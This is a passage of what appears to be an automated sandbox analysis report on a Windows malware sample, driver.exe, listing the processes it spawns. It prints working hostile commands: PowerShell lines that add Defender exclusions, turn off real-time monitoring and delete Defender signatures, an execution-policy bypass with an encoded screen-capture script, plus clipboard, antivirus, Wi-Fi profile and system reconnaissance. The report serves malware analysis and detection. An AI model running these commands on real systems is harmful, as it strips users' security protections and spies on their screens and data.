Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29BD37C SetUnhandledExceptionFilter,	0_2_00007FF6A29BD37C
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29BD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6A29BD19C
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29BC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6A29BC910
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29CA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6A29CA684
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29BD37C SetUnhandledExceptionFilter,	2_2_00007FF6A29BD37C
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29BD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF6A29BD19C
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29BC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF6A29BC910
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29CA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF6A29CA684
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A7F83248 IsProcessorFeaturePresent,00007FF8B9F71A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8B9F71A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF8A7F83248
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A80BDFFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF8A80BDFFC
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A804212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF8A804212B
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8041CB7 SetUnhandledExceptionFilter,	2_2_00007FF8A8041CB7
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75429B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	77_2_00007FF75429B52C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75429A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	77_2_00007FF75429A66C
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75429B6D8 SetUnhandledExceptionFilter,	77_2_00007FF75429B6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542A4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	77_2_00007FF7542A4C10

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior

Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Users\user\Desktop\driver.exe "C:\Users\user\Desktop\driver.exe"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 